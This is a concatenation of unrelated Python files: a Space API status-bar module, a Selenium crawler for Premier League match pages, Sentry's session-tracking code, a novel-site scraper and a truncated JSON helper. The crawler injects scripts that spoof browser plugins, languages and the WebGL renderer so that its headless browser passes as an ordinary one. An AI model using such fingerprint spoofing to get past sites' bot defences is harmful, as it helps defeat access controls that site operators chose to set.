create_port_scanning_werkzeug_server = with_port_scanning(WerkzeugServer)
|
spaceapi.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=C0111,R0903
"""Displays the state of a Space API endpoint
Space API is an API for hackspaces based on JSON. See spaceapi.io for
an example.
Requires the following libraries:
* requests
* regex
Parameters:
* spaceapi.url: String representation of the api endpoint
* spaceapi.format: Format string for the output
Format Strings:
* Format strings are indicated by double %%
* They represent a leaf in the JSON tree, layers seperated by "."
* Boolean values can be overwritten by appending "%true%false"
in the format string
* Example: to reference "open" in "{"state":{"open": true}}"
you would write "%%state.open%%", if you also want
to say "Open/Closed" depending on the boolean you
would write "%%state.open%Open%Closed%%"
"""
import bumblebee.input
import bumblebee.output
import bumblebee.engine
import requests
import threading
import re
import json
def formatStringBuilder(s, json):
"""
Parses Format Strings
Parameter:
s -> format string
json -> the spaceapi response object
"""
identifiers = re.findall("%%.*?%%", s)
for i in identifiers:
ic = i[2:-2] # Discard %%
j = ic.split("%")
# Only neither of, or both true AND false may be overwritten
if len(j) != 3 and len(j) != 1:
return "INVALID FORMAT STRING"
if len(j) == 1: # no overwrite
s = s.replace(i, json[j[0]])
elif json[j[0]]: # overwrite for True
s = s.replace(i, j[1])
else: # overwrite for False
s = s.replace(i, j[2])
return s
class Module(bumblebee.engine.Module):
def __init__(self, engine, config):
super(Module, self).__init__(
engine, config, bumblebee.output.Widget(full_text=self.getState)
)
engine.input.register_callback(
self, button=bumblebee.input.LEFT_MOUSE, cmd=self.__forceReload
)
self._data = {}
self._error = None
self._threadingCount = 0
# The URL representing the api endpoint
self._url = self.parameter("url", default="http://club.entropia.de/spaceapi")
self._format = self.parameter(
"format", default=u" %%space%%: %%state.open%Open%Closed%%"
)
def state(self, widget):
try:
if self._error is not None:
return ["critical"]
elif self._data["state.open"]:
return ["warning"]
else:
return []
except KeyError:
return ["critical"]
def update(self, widgets):
if self._threadingCount == 0:
thread = threading.Thread(target=self.get_api_async, args=())
thread.start()
self._threadingCount = (
0 if self._threadingCount > 300 else self._threadingCount + 1
)
def getState(self, widget):
text = self._format
if self._error is not None:
text = self._error
else:
try:
text = formatStringBuilder(self._format, self._data)
except KeyError:
text = "KeyError"
return text
def get_api_async(self):
try:
with requests.get(self._url, timeout=10) as request:
# Can't implement error handling for python2.7 if I use
# request.json() as it uses simplejson in newer versions
self._data = self.__flatten(json.loads(request.text))
self._error = None
except requests.exceptions.Timeout:
self._error = "Timeout"
except requests.exceptions.HTTPError:
self._error = "HTTP Error"
except ValueError:
self._error = "Not a JSON response"
# left_mouse_button handler
def __forceReload(self, event):
self._threadingCount += 300
self._error = "RELOADING"
# Flattens the JSON structure recursively, e.g. ["space"]["open"]
# becomes ["space.open"]
def __flatten(self, json):
out = {}
for key in json:
value = json[key]
if type(value) is dict:
flattened_key = self.__flatten(value)
for fk in flattened_key:
out[key + "." + fk] = flattened_key[fk]
else:
out[key] = value
return out
# Author: Tobias Manske <tobias@chaoswg.xyz>
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
crawler.py
|
from bs4 import BeautifulSoup
import warnings; warnings.filterwarnings("ignore")
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from IPython.display import clear_output
import re, os, time, pickle, errno
import pandas as pd
import numpy as np
import threading
class BigwingCrawler():
def __init__(self, url='about:blank', page_range=None, page_type=None, browser='Chrome', headless=True, n_jobs=1, verbose=True):
'''
크롤러 클래스 생성자
:param url:
:param browser: 헤드리스 브라우저 지정 Chrome(Default) or PhantomJS
:param headless: 헤드리스 모드 설정 True(Default) or False
'''
try :
self.url = url
self.page_type = page_type
self.browser = browser
self.headless = headless
self.n_jobs = n_jobs
self.data = None
self.thread = []
self.verbose = verbose
if page_range != None:
self.partitioner(page_range[0], page_range[1], n_jobs)
self.start_page = page_range[0]
self.end_page = page_range[1]
self.error_page_list = self.load("error_pages")
self.success_page_list = self.load("success_pages")
except Exception as e:
print(e)
self.close()
def partitioner(self, start, end, divide):
partition_sp = np.linspace(start - 1, end, divide + 1).astype(int)
# 파티션정보 저장소 생성
self.partitions = {} # 파티션별 스크랩데이터 저장소
self.error_pages = {} # 파티션별 에러페이지 저장
self.success_pages = {} # 파티션별 성공페이지 저장
self.status = {} # 파티션별 진행상태 저장
self.successes = {} # 파티션별 성공건수 저장
self.processeds = {} # 파티션별 처리건수 저장
self.errors = {} # 파티션별 에러건수 저장
self.run_flags = {} # 파티션별 실행 여부 플래그
self.stop_flags = {} # 파티션별 중단 여부 플래그
self.zip_flag = 0 # 파티션 병합 여부 플래그
self.drivers = {} # 파티션별 브라우저 드라이버 저장
self.htmls = {} # 파티션별 html 문서 저장
self.soups = {} # 파티션별 BeautifulSoup 객체 저장
self.processes = {} # 각 파티션의 프로세스 저장
# 파티션저장소별 초기화
for i in range(len(partition_sp) - 1):
# 파티션별 키 생성 (키값에 파티션 페이지범위 포함)
partition_key = (partition_sp[i] + 1, partition_sp[i + 1])
self.open(partition_key) # 브라우저 오픈
self.partitions[partition_key] = pd.DataFrame()
self.error_pages[partition_key] = []
self.success_pages[partition_key] = []
self.status[partition_key] = "준비완료"
self.successes[partition_key] = 0
self.processeds[partition_key] = 0
self.errors[partition_key] = 0
self.processes[partition_key] = None
self.run_flags[partition_key] = False
self.stop_flags[partition_key] = True
def start(self):
if self.verbose == True: print("{} 개 프로세스로 작동합니다.".format(len(self.partitions.keys())))
for partition_key in self.partitions:
self.status[partition_key] = "진행중"
self.processes[partition_key] = threading.Thread(target=self.crawl, args=(partition_key,))
self.run_flags[partition_key] = True
self.stop_flags[partition_key] = False
for process in self.processes.values() :
process.start()
# for process in self.processes.values() :
# process.join()
def restart(self, part_nm=None):
keys = list(self.partitions.keys())
if part_nm != None :
if part_nm > len(keys) : print("{}번 프로세스는 없습니다."); return;
partition_key = keys[part_nm + 1]
self.run_flags[partition_key] = True
self.status[partition_key] = "진행중"
print("{} 프로세스 재시작".format(partition_key))
else :
for partition_key in keys :
self.run_flags[partition_key] = True
self.status[partition_key] = "진행중"
print("{} 프로세스 재시작".format(partition_key))
def pause(self, part_nm=None):
keys = list(self.partitions.keys())
if part_nm != None :
if part_nm > len(keys) : print("{}번 프로세스는 없습니다."); return;
partition_key = keys[part_nm + 1]
self.run_flags[partition_key] = False
self.status[partition_key] = "일시정지"
print("{} 프로세스 일시정지".format(partition_key))
else :
for partition_key in keys :
self.run_flags[partition_key] = False
self.status[partition_key] = "일시정지"
print("{} 프로세스 일시정지".format(partition_key))
def stop(self, part_nm=None):
keys = list(self.partitions.keys())
if part_nm != None:
if part_nm > len(keys): print("{}번 프로세스는 없습니다."); return;
partition_key = keys[part_nm + 1]
self.stop_flags[partition_key] = True
self.status[partition_key] = "중단"
print("{} 프로세스 중단".format(partition_key))
else:
for partition_key in keys:
self.stop_flags[partition_key] = True
self.status[partition_key] = "중단"
print("{} 프로세스 중단".format(partition_key))
time.sleep(2)
self.close()
def set_verbose(self, verbose):
self.verbose = verbose
def open(self, partition_key):
self.drivers[partition_key] = self.set_driver(self.url)
self.htmls[partition_key] = self.set_html(partition_key)
self.soups[partition_key] = self.set_soup(partition_key)
print("{} 페이지 브라우저를 오픈했습니다.".format(partition_key))
def clear(self):
import shutil
try :
shutil.rmtree("tmpdata/{}".format(self.page_type))
print("데이터 삭제")
except FileNotFoundError as e :
print("기록이 없습니다.")
def backup(self):
import shutil
from datetime import datetime
timestamp = datetime.strftime(datetime.now(), "%m%d_%H%M")
tmpdir = os.path.join(os.path.abspath(os.path.curdir), "tmpdata")
backupdir = os.path.join(os.path.abspath(os.path.curdir), "backup")
dstdir = os.path.join(backupdir, timestamp)
if not os.path.isdir(backupdir):
os.makedirs(backupdir)
try :
shutil.move(tmpdir, dstdir)
print("{} 로 데이터를 백업했습니다.".format(
os.path.join(dstdir, self.page_type)))
except :
pass
def refresh(self, partition_key):
for i in range(self.n_jobs) :
self.htmls[partition_key] = self.set_html(partition_key)
self.soups[partition_key] = self.set_soup(partition_key)
def picker(self, partition_key, parant_tag, child_tag=None):
'''
웹페이지에서 검색대상 정보가 있는 태그를 설정하고 웹페이지 전체 데이터를 가져오는 함수
:param parant_tag: 상위 태그 설정 인수
:param child_tag: 하위 태그 설정 인수 (Default : None)
:return: list타입의 list타입 변수
'''
tags = self.soups[partition_key].select(parant_tag)
results = []
for tag in tags :
if child_tag != None :
tag = tag.select(child_tag)
tag = [data.text.strip() for data in tag]
if tag == [] :
continue
results.append(tag)
return results
def fetch(self, partition_key, keyword):
'''
추상화 함수 : 단일 레코드 크롤링 함수
:param keyword: 검색어
:return: 없음
'''
pass
def insert(self, input_data, col):
pass
def takeout(self):
'''
크롤링한 데이터셋을 리턴하는 함수
:return: data ( 타입 : 데이터프레임 or 딕셔너리(데이터프레임) )
'''
if self.n_jobs == 1:
return self.partitions.pop()
else:
if self.zip_flag == 0:
return self.partitions
else:
return self.data
def save(self):
self.data = pd.DataFrame()
for partition in self.partitions.values():
self.data = self.data.append(partition)
self.data = self.data.reset_index(drop=True)
print("데이터 병합")
self.record()
print("스크랩 로그기록")
self.log()
self.zip_flag = 1
def monitor(self, second=2):
self.set_verbose(False)
while True:
try:
self.summary()
clear_output(wait=True)
time.sleep(second)
except KeyboardInterrupt:
break;
self.set_verbose(True)
print("모니터링 종료")
def summary(self):
print("-" * 108)
for partition_key in self.partitions:
line = "{:>15} 스크랩프로세스 | {:>5}% {} | 총 {:>6}건 | 성공 {:>6}건 | 실패 {:>6}건".format(
str(partition_key),
("%.1f" % (self.processeds[partition_key] / (partition_key[1] - partition_key[0] + 1) * 100)),
self.status[partition_key],
partition_key[1] - partition_key[0] + 1,
self.successes[partition_key],
self.errors[partition_key],
)
print("|{:>82} |".format(line))
print("-" * 108)
total_processeds = 0
for i in self.processeds.values() : total_processeds += i
total_successes = 0
for i in self.successes.values(): total_successes += i
total_errors = 0
for i in self.errors.values(): total_errors += i
total_status = "준비완료"
for status in self.status.values() :
if "진행중" in status : total_status = "진행중"
cnt = 0
for status in self.status.values() :
if "종료" in status : cnt +=1
if cnt == len(self.status.values()) :
total_status = "종료"
percentage = (total_processeds / (self.end_page - self.start_page + 1)) * 100
line = "{:>12} 스크랩프로세스 | {:>5}% {} | 총 {:>6}건 | 성공 {:>6}건 | 실패 {:>6}건".format(
"전체",
"%.1f" % percentage,
total_status,
self.end_page - self.start_page + 1,
total_successes,
total_errors,
)
print("|{:>80} |".format(line))
print("-" * 108)
def record(self):
filename = "total_{}_{}_{}".format(self.page_type, self.start_page, self.end_page)
try:
if not (os.path.isdir(os.path.join("tmpdata", self.page_type))):
os.makedirs(os.path.join("tmpdata", self.page_type))
if not (os.path.isdir(os.path.join("tmpdata", self.page_type, "data"))):
os.makedirs(os.path.join("tmpdata", self.page_type, "data"))
except OSError as e:
if e.errno != errno.EEXIST:
print("디렉토리 생성 실패.")
raise
try :
with open("tmpdata/{}/data/{}.pkl".format(self.page_type, filename), "rb") as f:
dump_data = pickle.load(f)
except:
dump_data = pd.DataFrame()
dump_data = dump_data.append(self.data).reset_index(drop=True)
with open("tmpdata/{}/data/{}.pkl".format(self.page_type, filename), "wb") as f:
pickle.dump(dump_data, f)
#기존 데이터와 병합
try :
file_data = pd.read_csv("tmpdata/{}/data/{}.csv".format(self.page_type, filename), encoding="utf8", index_col=False)
except FileNotFoundError :
file_data = pd.DataFrame()
file_data = file_data.append(self.data).reset_index(drop=True)
file_data.to_csv("tmpdata/{}/data/{}.csv".format(self.page_type, filename), encoding="utf8", index=False)
print("{} 로 데이터를 저장했습니다.".format(os.path.join(os.path.abspath(os.path.curdir),"tmpdata",self.page_type, "data", filename + ".csv")))
def load(self, filename):
import pickle
try :
with open("tmpdata/{}/log/{}.pkl".format(self.page_type, filename), "rb") as f:
data = pickle.load(f)
return data
except :
return []
def crawl(self, partition_key):
pass
def scrap(self, partition_key):
pass
def set_page(self, partition_key, page_nm):
pass
def _check(self, attr) :
'''
클래스 속성이 존재하는지 검사하는 함수(클래스 내부사용)
:param attr: 속성 변수
:return: 없음
'''
try:
getattr(self, attr)
except AttributeError:
raise RuntimeError("FAILED : {} 를 확인해주세요.".format(attr))
def set_soup(self, partition_key):
'''
BeautifulSoup 객체를 생성하는 Setter 함수
:param url: url 문자열 값 입력 받는 인수
:param browser: 헤드리스 브라우저 지정(Default : Chrome) #PhantomJs 사용가능
:return: 없음
'''
return BeautifulSoup(self.htmls[partition_key], 'html.parser')
def set_html(self, partition_key):
'''
문자열 타입 html 문서를 저장하는 Setter 함수
:param url:
:param browser:
:return: 없음
'''
return self.drivers[partition_key].page_source
def set_driver(self, url):
'''
selenium 패키지의 browser driver 모듈을 세팅하는 함수
:param url: 문자열타입 url 주소를 입력받는 인수
:param browser: 브라우저를 지정하는 인수 (Default : Chrome) # PhantomJS 도가능
:return: 없음
'''
driver = None
option = Options()
option.add_argument('headless')
option.add_argument('window-size=1920x1080')
option.add_argument("disable-gpu")
# Headless숨기기1
option.add_argument(
"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36")
option.add_argument("lang=ko_KR")
cur_dir = os.path.abspath(os.path.dirname(__file__))
browser_dir = os.path.join(cur_dir, "browser")
if self.browser == "Chrome":
browser_file = browser_dir + "/chromedriver.exe"
if self.headless == True :
driver = webdriver.Chrome(browser_file, chrome_options=option)
else :
driver = webdriver.Chrome(browser_file)
driver.get('about:blank')
driver.execute_script("Object.defineProperty(navigator, 'plugins', {get: function() {return[1, 2, 3, 4, 5]}})")
driver.execute_script("const getParameter = WebGLRenderingContext.getParameter;WebGLRenderingContext.prototype.getParameter = function(parameter) {if (parameter === 37445) {return 'NVIDIA Corporation'} if (parameter === 37446) {return 'NVIDIA GeForce GTX 980 Ti OpenGL Engine';}return getParameter(parameter);};")
else:
browser_file = browser_dir + "/PhantomJS.exe"
driver = webdriver.PhantomJS(browser_file)
driver.execute_script("Object.defineProperty(navigator, 'languages', {get: function() {return ['ko-KR', 'ko']}})")
driver.implicitly_wait(3)
driver.get(url)
return driver
def get_text(self, partition_key):
'''
인스턴스의 html 변수의 텍스트 정보를 얻어오는 함수
:return: 문자열 타입 text
'''
text = ""
p = re.compile(r'(<.{1,5}/?>)(?P<content>[^<\n]+)(</.{1,5}>)', re.M)
m = p.finditer(self.htmls[partition_key])
lines = [line.group("content").strip() for line in m]
for line in lines :
text = text + "\n" + line
return text
def get_tags(self, partition_key):
'''
인스턴스의 html 변수의 사용된 tag 문자열 리스트를 리턴하는 함수
:return: 문자열들의 list 타입
'''
alltags = self.soups[partition_key].find_all(True)
alltags = [tag.name for tag in alltags]
alltags = list(set(alltags))
return alltags
def get_attrs(self, partition_key):
'''
인스턴스의 html변수가 담고 있는 문서의 속성명을 문자열 리스트로 반환하는 함수
:return: 문자열 list 타입
'''
tags = self.soups[partition_key].find_all(True)
attrs_list = [[attr for attr in tag.attrs.keys()] for tag in tags]
attrs = []
for attr in attrs_list:
attrs.extend(attr)
attrs = list(set(attrs))
return attrs
def log(self):
try:
if not (os.path.isdir(os.path.join("tmpdata", self.page_type))):
os.makedirs(os.path.join("tmpdata", self.page_type))
if not (os.path.isdir(os.path.join("tmpdata", self.page_type, "log"))):
os.makedirs(os.path.join("tmpdata", self.page_type, "log"))
except OSError as e:
if e.errno != errno.EEXIST:
print("디렉토리 생성 실패.")
raise
#에러페이지 기록
error_page_list = []
for partition in self.error_pages.values() :
error_page_list.extend(partition)
pd.DataFrame(error_page_list).to_csv("tmpdata/{}/log/{}_pages.csv".format(self.page_type, "error"), encoding="utf8")
with open("tmpdata/{}/log/{}_pages.pkl".format(self.page_type, "error"), "wb") as f:
pickle.dump(error_page_list, f)
print("{} 로 데이터를 저장했습니다.".format(
os.path.join(os.path.abspath(os.path.curdir), "tmpdata", self.page_type, "log", "error_pages.csv")))
#성공페이지 기록
success_page_list = []
for partition in self.success_pages.values():
success_page_list.extend(partition)
pd.DataFrame(success_page_list).to_csv("tmpdata/{}/log/{}_pages.csv".format(self.page_type, "success"), encoding="utf8")
with open("tmpdata/{}/log/{}_pages.pkl".format(self.page_type, "success"), "wb") as f:
pickle.dump(success_page_list, f)
print("{} 로 데이터를 저장했습니다.".format(
os.path.join(os.path.abspath(os.path.curdir), "tmpdata", self.page_type, "log", "success_pages.csv")))
def __del__(self) :
self.close()
print("크롤러 종료")
class EPLCrawler(BigwingCrawler):
def __init__(self, url='about:blank', page_range=None, page_type="Lineup", browser='Chrome', headless=True, n_jobs=1, verbose=True):
super().__init__(url, page_range, page_type, browser, headless, n_jobs, verbose)
if page_type=="Lineup" or page_type=="Matchs" :
self.url = "https://www.premierleague.com/match/"
else : pass;
time.sleep(2)
def crawl(self, partition_key):
#페이지 커서 설정
cur_page = first_page = partition_key[0]; last_page = partition_key[1]
error_flag = False
#데이터셋 타입 결정
if self.page_type == "Lineup" : dataset = pd.DataFrame()
elif self.page_type == "Matchs" : dataset = pd.DataFrame()
else : pass
#데이터 스크랩 프로세스
while cur_page < (last_page + 1) :
if cur_page in self.success_page_list : #이미 크롤링이 성공한 페이지는 넘어가기
if cur_page < (last_page + 1) :
self.success_pages[partition_key].extend([cur_page])
self.processeds[partition_key] +=1
self.successes[partition_key] +=1
cur_page += 1
continue
else : break;
self.status[partition_key] = "{}번 스크랩중".format(cur_page)
while self.run_flags[partition_key] == False : time.sleep(0.5) # 일시정지
if self.stop_flags[partition_key] == True : break; # 중단
try:
self.set_page(partition_key, cur_page)
# 스크랩
if self.page_type == "Lineup": # 라인업 페이지 크롤러
data = self.scrap_lineup(partition_key)
elif self.page_type == "Matchs": # 매치 페이지 크롤러
data = self.scrap_matchstats(partition_key)
else: pass;
data.insert(0, "Match_ID", cur_page) #페이지 넘버 스탬프
# 매치정보가 많이 부족할때 에러 체크
if data.shape[1] < 10 :
error_flag = True
if self.verbose == True: print("{}번 스크랩실패.".format(cur_page))
else:
error_flag = False
if self.verbose == True: print("{}번 스크랩성공.".format(cur_page))
# 기존기록에 추가
dataset = dataset.append(data).fillna("")
self.partitions[partition_key] = dataset.reset_index(drop=True)
except Exception as e:
if self.verbose == True : print("{} : {}번 스크랩실패".format(e, cur_page))
error_flag = True
#현재 페이지 스크랩결과 기록
self.processeds[partition_key] += 1
if error_flag == False :
self.successes[partition_key] += 1 # 성공건수 기록
self.success_pages[partition_key].extend([cur_page]) # 성공페이지 기록
self.success_page_list.extend([cur_page])
else :
self.errors[partition_key] += 1 # 실패건수 기록
self.error_pages[partition_key].extend([cur_page]) # 에러페이지 기록
self.error_page_list.extend([cur_page])
cur_page += 1
#스크랩 상태 저장 & 리포트
if self.verbose == True: print("({}, {}) 프로세스 스크랩완료".format(first_page, last_page))
self.status[partition_key] = "완료" if self.stop_flags[partition_key] == True else "종료"
def close(self):
for partition_key in self.partitions:
try :
self.drivers[partition_key].close()
except : pass
try :
self.drivers[partition_key].quit()
except : pass
print("{} 브라우저를 종료했습니다.".format(partition_key))
def scrap_matchstats(self, partition_key):
# 매치 기본 정보
matchInfo = self.drivers[partition_key].find_element_by_class_name("matchInfo").text.split("\n")
# 매치 클럽 이름
home_nm = self.drivers[partition_key].find_element_by_xpath(
"//*[@id='mainContent']/div/section/div[2]/section/div[3]/div/div/div[1]/div[1]/a[2]/span[1]").text
away_nm = self.drivers[partition_key].find_element_by_xpath(
"//*[@id='mainContent']/div/section/div[2]/section/div[3]/div/div/div[1]/div[3]/a[2]/span[1]").text
# 경기 스코어
score = self.drivers[partition_key].find_element_by_xpath(
"//*[@id='mainContent']/div/section/div[2]/section/div[3]/div/div/div[1]/div[2]/div").text
dataset = self.picker(partition_key, "tr", "td")
cols = ["matchinfo_"+str(i+1) for i in range(len(matchInfo))] + ["home_team", "score", "away_team"] + ["home_" + data[1] for data in dataset] + ["away_" + data[1] for data in dataset]
vals = matchInfo + [home_nm, score, away_nm] + [data[0] for data in dataset] + [data[2] for data in dataset]
matchstats = pd.DataFrame(columns=cols)
matchstats.loc[0] = vals
return matchstats
def scrap_lineup(self, partition_key):
lineup = pd.DataFrame(
columns=["Team", "Number", "Name", "Goal", "Sub_On_Off", "Sub_Time", "Card", "Playing", "Position",
"Nationality"])
for team in range(2):
# 포지션리스트
position_list = [position.text for position in self.soups[partition_key].find_all("div", "matchLineupTeamContainer")[team].select("h3")]
groups = self.soups[partition_key].find_all("div", "matchLineupTeamContainer")[team].select("ul")
# 각 그룹들
for group_idx, group in enumerate(groups):
players = groups[group_idx].find_all("li", "player")
# 각 선수들
for player in players:
player_info = []
team_nm = self.soups[partition_key].select("header.squadHeader > div.position")[team].find(text=True).strip()
player_info.append(team_nm) # 팀이름
number = player.find("div", "number").get_text().replace("Shirt number ", "");
player_info.append(number) # 선수 넘버
info_tag = player.select("div.info")
for tag in info_tag:
nametag = tag.select(".name")[0]
name = nametag.find(text=True).strip();
player_info.append(name) # 선수이름
try: # 골수
p = re.compile(r'icn ball')
m = p.findall(str(nametag))
player_info.append(len(m))
except:
player_info.append(0)
try: # 경기 인아웃
p = re.compile(r'sub-on|sub-off')
m = p.search(str(nametag))
if m.group(0) == "sub-on":
player_info.append("On")
elif m.group(0) == "sub-off":
player_info.append("Off")
except:
player_info.append("")
try: # 교체 시간
player_info.append(nametag.select("span.sub")[0].text)
except:
player_info.append("")
try: # 카드 여부
p = re.compile(r'yellow|red')
m = p.search(str(nametag))
if m.group(0) == "yellow":
player_info.append("Yellow")
elif m.group(0) == "red":
player_info.append("Red")
except:
player_info.append("")
try: # 주전/후보 여부
player_info.append("starter" if position_list[group_idx] != "Substitutes" or group_idx >= 4 else "substitutes")
except:
player_info.append("substitutes")
try: # 포지션
player_info.append(tag.select(".position")[0].text.strip())
except:
player_info.append(position_list[group_idx])
try: # 국가
player_info.append(tag.select(".nationality")[0].text.strip())
except:
player_info.append("")
lineup.loc[lineup.shape[0]] = player_info
# 경기정보
try:
matchinfo = [""] * 4
matchinfo_tmp = [info.text.replace("Att: ", "") for info in self.soups[partition_key].select("div.matchInfo > div")]
for idx, info in enumerate(matchinfo_tmp):
matchinfo[idx] = info
except :
matchinfo = [""] * 4
lineup.insert(0, "Match_Date", matchinfo[0])
lineup.insert(1, "Referee", matchinfo[1])
lineup.insert(2, "Stadium", matchinfo[2])
lineup.insert(3, "Attendence", matchinfo[3])
try:
score = self.soups[partition_key].select("div.score")[0].text
except:
score = ""
lineup.insert(4, "Score", score)
return lineup
def set_page(self, partition_key, page_nm) :
dst_url = self.url + str(page_nm)
self.drivers[partition_key].get(dst_url)
try:
if not (os.path.isdir(os.path.join("tmpdata", self.page_type))):
os.makedirs(os.path.join("tmpdata", self.page_type))
except OSError as e:
if e.errno != errno.EEXIST:
print("디렉토리 생성 실패.")
raise
time.sleep(0.3)
if self.page_type == "Lineup" :
if self.drivers[partition_key].find_element_by_class_name("matchCentreSquadLabelContainer").text.strip() == 'Line-ups' :
self.drivers[partition_key].find_element_by_class_name("matchCentreSquadLabelContainer").click()
else : raise NameError('NoLineups')
elif self.page_type == "Matchs" :
self.drivers[partition_key].find_element_by_xpath(
"//*[@id='mainContent']/div/section/div[2]/div[2]/div[1]/div/div/ul/li[3]").click()
time.sleep(0.2)
self.refresh(partition_key)
|
sessions.py
|
import os
import uuid
import time
from datetime import datetime
from threading import Thread, Lock
from contextlib import contextmanager
from sentry_sdk._types import MYPY
from sentry_sdk.utils import format_timestamp
if MYPY:
import sentry_sdk
from typing import Optional
from typing import Union
from typing import Any
from typing import Dict
from typing import Generator
from sentry_sdk._types import SessionStatus
def is_auto_session_tracking_enabled(hub=None):
# type: (Optional[sentry_sdk.Hub]) -> bool
"""Utility function to find out if session tracking is enabled."""
if hub is None:
hub = sentry_sdk.Hub.current
should_track = hub.scope._force_auto_session_tracking
if should_track is None:
exp = hub.client.options["_experiments"] if hub.client else {}
should_track = exp.get("auto_session_tracking")
return should_track
@contextmanager
def auto_session_tracking(hub=None):
# type: (Optional[sentry_sdk.Hub]) -> Generator[None, None, None]
"""Starts and stops a session automatically around a block."""
if hub is None:
hub = sentry_sdk.Hub.current
should_track = is_auto_session_tracking_enabled(hub)
if should_track:
hub.start_session()
try:
yield
finally:
if should_track:
hub.end_session()
def _make_uuid(
val, # type: Union[str, uuid.UUID]
):
# type: (...) -> uuid.UUID
if isinstance(val, uuid.UUID):
return val
return uuid.UUID(val)
TERMINAL_SESSION_STATES = ("exited", "abnormal", "crashed")
class SessionFlusher(object):
def __init__(
self,
flush_func, # type: Any
flush_interval=10, # type: int
):
# type: (...) -> None
self.flush_func = flush_func
self.flush_interval = flush_interval
self.pending = {} # type: Dict[str, Any]
self._thread = None # type: Optional[Thread]
self._thread_lock = Lock()
self._thread_for_pid = None # type: Optional[int]
self._running = True
def flush(self):
# type: (...) -> None
pending = self.pending
self.pending = {}
self.flush_func(list(pending.values()))
def _ensure_running(self):
# type: (...) -> None
if self._thread_for_pid == os.getpid() and self._thread is not None:
return None
with self._thread_lock:
if self._thread_for_pid == os.getpid() and self._thread is not None:
return None
def _thread():
# type: (...) -> None
while self._running:
time.sleep(self.flush_interval)
if self.pending and self._running:
self.flush()
thread = Thread(target=_thread)
thread.daemon = True
thread.start()
self._thread = thread
self._thread_for_pid = os.getpid()
return None
def add_session(
self, session # type: Session
):
# type: (...) -> None
self.pending[session.sid.hex] = session.to_json()
self._ensure_running()
def kill(self):
# type: (...) -> None
self._running = False
def __del__(self):
# type: (...) -> None
self.kill()
class Session(object):
def __init__(
self,
sid=None, # type: Optional[Union[str, uuid.UUID]]
did=None, # type: Optional[str]
timestamp=None, # type: Optional[datetime]
started=None, # type: Optional[datetime]
duration=None, # type: Optional[float]
status=None, # type: Optional[SessionStatus]
release=None, # type: Optional[str]
environment=None, # type: Optional[str]
user_agent=None, # type: Optional[str]
ip_address=None, # type: Optional[str]
errors=None, # type: Optional[int]
user=None, # type: Optional[Any]
):
# type: (...) -> None
if sid is None:
sid = uuid.uuid4()
if started is None:
started = datetime.utcnow()
if status is None:
status = "ok"
self.status = status
self.did = None # type: Optional[str]
self.started = started
self.release = None # type: Optional[str]
self.environment = None # type: Optional[str]
self.duration = None # type: Optional[float]
self.user_agent = None # type: Optional[str]
self.ip_address = None # type: Optional[str]
self.errors = 0
self.update(
sid=sid,
did=did,
timestamp=timestamp,
duration=duration,
release=release,
environment=environment,
user_agent=user_agent,
ip_address=ip_address,
errors=errors,
user=user,
)
def update(
self,
sid=None, # type: Optional[Union[str, uuid.UUID]]
did=None, # type: Optional[str]
timestamp=None, # type: Optional[datetime]
started=None, # type: Optional[datetime]
duration=None, # type: Optional[float]
status=None, # type: Optional[SessionStatus]
release=None, # type: Optional[str]
environment=None, # type: Optional[str]
user_agent=None, # type: Optional[str]
ip_address=None, # type: Optional[str]
errors=None, # type: Optional[int]
user=None, # type: Optional[Any]
):
# type: (...) -> None
# If a user is supplied we pull some data form it
if user:
if ip_address is None:
ip_address = user.get("ip_address")
if did is None:
did = user.get("id") or user.get("email") or user.get("username")
if sid is not None:
self.sid = _make_uuid(sid)
if did is not None:
self.did = str(did)
if timestamp is None:
timestamp = datetime.utcnow()
self.timestamp = timestamp
if started is not None:
self.started = started
if duration is not None:
self.duration = duration
if release is not None:
self.release = release
if environment is not None:
self.environment = environment
if ip_address is not None:
self.ip_address = ip_address
if user_agent is not None:
self.user_agent = user_agent
if errors is not None:
self.errors = errors
if status is not None:
self.status = status
def close(
self, status=None # type: Optional[SessionStatus]
):
# type: (...) -> Any
if status is None and self.status == "ok":
status = "exited"
if status is not None:
self.update(status=status)
def to_json(self):
# type: (...) -> Any
rv = {
"sid": str(self.sid),
"init": True,
"started": format_timestamp(self.started),
"timestamp": format_timestamp(self.timestamp),
"status": self.status,
} # type: Dict[str, Any]
if self.errors:
rv["errors"] = self.errors
if self.did is not None:
rv["did"] = self.did
if self.duration is not None:
rv["duration"] = self.duration
attrs = {}
if self.release is not None:
attrs["release"] = self.release
if self.environment is not None:
attrs["environment"] = self.environment
if self.ip_address is not None:
attrs["ip_address"] = self.ip_address
if self.user_agent is not None:
attrs["user_agent"] = self.user_agent
if attrs:
rv["attrs"] = attrs
return rv
|
day3homework_1.py
|
import requests
import re
import threading
def spider(listadd):
for j in listadd:
response = requests.get(j)
response.encoding = 'utf-8'
title = re.findall('<h1>\n(.*)</h1>', response.text, re.S)
content = re.findall('  (.*?)<br /><br />', response.text)
temp=title+content
temp_new=[]
for q in temp:
temp_new.append(q+'\r\n')
with open('/home/ubuntu/Desktop/out1/qqq'+j.split('/')[-1][0:7]+'.txt', 'w',) as f:
f.writelines(temp_new)
# print(title)
# print(content)
def part(url):
baseurl = 'http://www.17k.com'
res1 = re.compile('<dd>.*</dd>', re.S)
res2 = res1.findall(url)
res = re.findall('href="(.*.html)', res2[0])
ls = [baseurl+i for i in res]
ls1 = []
ls2 = []
flag = 1
for i in ls:
if flag == 1:
ls1.append(i)
else:
ls2.append(i)
flag = -flag
# print(i)
thread_1 = threading.Thread(target=spider, args=(ls1,))
thread_2 = threading.Thread(target=spider, args=(ls2,))
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
def wenjian():
str1 = 'http://www.17k.com/list/2933095.html'
str2 = requests.get(str1)
str2.encoding = 'utf-8'
part(str2.text)
if __name__ == "__main__":
wenjian()
|
AsynchronousThreading.py
|
"""
"""
import threading
from src.utils.Prints import pt
import traceback
import json
def object_to_json(object, attributes_to_delete=None):
"""
Convert class to json with properties method.
:param attributes_to_delete: String set with all attributes' names to delete from properties method
:return: sort json from class properties.
"""
try:
object_dictionary = class_properties(object=object, attributes_to_delete=attributes_to_delete)
json_string = json.dumps(object, default=lambda m: object_dictionary, sort_keys=True, indent=4)
except Exception as e:
pt(e)
